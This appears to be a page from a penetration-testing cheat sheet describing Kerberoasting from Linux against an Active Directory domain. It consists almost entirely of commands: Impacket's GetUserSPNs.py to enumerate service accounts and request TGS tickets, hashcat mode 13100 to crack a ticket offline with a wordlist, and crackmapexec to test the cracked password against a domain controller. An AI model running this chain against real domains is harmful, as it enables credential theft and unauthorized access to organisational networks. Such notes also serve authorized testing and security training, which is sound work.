Linux
Kerberoasting with GetUserSPNs.py
# Installing Impacket using Pip
# <https://github.com/SecureAuthCorp/impacket>
sudo python3 -m pip install .
# Listing SPN Accounts with GetUserSPNs.py
GetUserSPNs.py -dc-ip 10.10.10.10 DOMAIN.LOCAL/eren
# Requesting all TGS Tickets
GetUserSPNs.py -dc-ip 10.10.10.10 DOMAIN.LOCAL/eren -request
# Requesting a Single TGS ticket
GetUserSPNs.py -dc-ip 10.10.10.10 DOMAIN.LOCAL/eren -request-user sqldev -outputfile sqldev_tgs
# Cracking the Ticket Offline with Hashcat
hashcat -m 13100 sqldev_tgs /usr/share/wordlists/rockyou.txt
# Testing Authentication against a Domain Controller
sudo crackmapexec smb ip -u eren -p pass
Last updated